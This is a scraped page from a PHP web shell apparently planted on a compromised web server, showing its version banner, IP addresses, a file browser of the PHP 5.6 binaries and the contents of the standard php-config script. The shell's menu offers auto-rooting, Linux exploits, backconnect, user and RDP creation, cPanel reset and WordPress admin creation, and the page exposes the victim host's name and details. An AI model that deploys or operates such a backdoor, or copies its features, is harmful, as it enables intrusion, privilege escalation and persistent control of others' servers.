Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
php56 /
usr /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
lsphp
41.26
MB
-rwxr-xr-x
pear
857
B
-rwxr-xr-x
peardev
878
B
-rwxr-xr-x
pecl
791
B
-rwxr-xr-x
phar
14.49
KB
-rwxr-xr-x
phar.phar
14.49
KB
-rwxr-xr-x
php
41.35
MB
-rwxr-xr-x
php-cgi
41.24
MB
-rwxr-xr-x
php-config
3.54
KB
-rwxr-xr-x
phpize
4.44
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php-config
#! /bin/sh SED="/usr/bin/sed" prefix="/opt/alt/php56/usr" datarootdir="/opt/alt/php56/usr/php" exec_prefix="${prefix}" version="5.6.40" vernum="50640" include_dir="${prefix}/include/php" includes="-I$include_dir -I$include_dir/main -I$include_dir/TSRM -I$include_dir/Zend -I$include_dir/ext -I$include_dir/ext/date/lib" ldflags="" libs="-lcrypt -lc-client -lz -lexslt -ltidy -lresolv -lcrypt -laspell -lpspell -lrt -lmcrypt -lltdl -lstdc++ -lcrypt -lpng -lz -ljpeg -lvpx -lcurl -lbz2 -lz -lrt -lm -ldl -lnsl -lxml2 -lz -lm -ldl -lgssapi_krb5 -lkrb5 -lk5crypto -lcom_err -lssl -lcrypto -lcurl -lxml2 -lz -lm -ldl -lssl -lcrypto -lfreetype -lgssapi_krb5 -lkrb5 -lk5crypto -lcom_err -lssl -lcrypto -ldl -lm -licui18n -licuuc -licudata -ldl -lm -licuio -lxml2 -lz -lm -ldl -lxml2 -lz -lm -ldl -lcrypt -lxml2 -lz -lm -ldl -lxml2 -lz -lm -ldl -lxml2 -lz -lm -ldl -lxml2 -lz -lm -ldl -lxml2 -lz -lm -ldl -lxslt -lxml2 -lz -ldl -lm -lssl -lcrypto -lcrypt " extension_dir='/opt/alt/php56/usr/lib/php/extensions/no-debug-non-zts-20131226' man_dir=`eval echo ${datarootdir}/man` program_prefix="" program_suffix="" exe_extension="" php_cli_binary=NONE php_cgi_binary=NONE configure_options=" '--prefix=/opt/alt/php56/usr' '--with-config-file-path=/opt/alt/php56/usr/php' '--enable-cgi' '--with-config-file-scan-dir=/opt/alt/php56/usr/php/php.d' '--with-zlib' '--enable-soap' '--with-mysql-sock=/var/lib/mysql/mysql.sock' '--with-pspell' '--enable-wddx' '--with-tidy' '--enable-exif' '--enable-phar' '--enable-bcmath' '--enable-calendar' '--with-curl' '--with-iconv' '--with-mysql' '--with-mysqli' '--with-mysql=mysqlnd' '--with-mysqli=mysqlnd' '--with-mcrypt' '--with-gettext' '--with-xsl' '--with-xmlrpc' '--with-pdo-mysql=mysqlnd' '--enable-posix' '--enable-ftp' '--with-openssl' '--enable-mbstring' '--with-kerberos' '--with-bz2' '--enable-sockets' '--enable-zip' '--with-gd' '--with-jpeg-dir=/usr' '--with-freetype-dir=/usr' '--with-png-dir=/usr' '--enable-gd-native-ttf' '--with-vpx-dir=/usr' '--with-pcre-regex' '--with-libdir=lib64' '--enable-intl' '--with-icu-dir=/usr' '--with-imap' '--with-imap-ssl' '--with-litespeed'" php_sapis=" cli litespeed cgi" # Set php_cli_binary and php_cgi_binary if available for sapi in $php_sapis; do case $sapi in cli) php_cli_binary="${exec_prefix}/bin/${program_prefix}php${program_suffix}${exe_extension}" ;; cgi) php_cgi_binary="${exec_prefix}/bin/${program_prefix}php-cgi${program_suffix}${exe_extension}" ;; esac done # Determine which (if any) php binary is available if test "$php_cli_binary" != "NONE"; then php_binary="$php_cli_binary" else php_binary="$php_cgi_binary" fi # Remove quotes configure_options=`echo $configure_options | $SED -e "s#'##g"` case "$1" in --prefix) echo $prefix;; --includes) echo $includes;; --ldflags) echo $ldflags;; --libs) echo $libs;; --extension-dir) echo $extension_dir;; --include-dir) echo $include_dir;; --php-binary) echo $php_binary;; --php-sapis) echo $php_sapis;; --configure-options) echo $configure_options;; --man-dir) echo $man_dir;; --version) echo $version;; --vernum) echo $vernum;; *) cat << EOF Usage: $0 [OPTION] Options: --prefix [$prefix] --includes [$includes] --ldflags [$ldflags] --libs [$libs] --extension-dir [$extension_dir] --include-dir [$include_dir] --man-dir [$man_dir] --php-binary [$php_binary] --php-sapis [$php_sapis] --configure-options [$configure_options] --version [$version] --vernum [$vernum] EOF exit 1;; esac exit 0
Close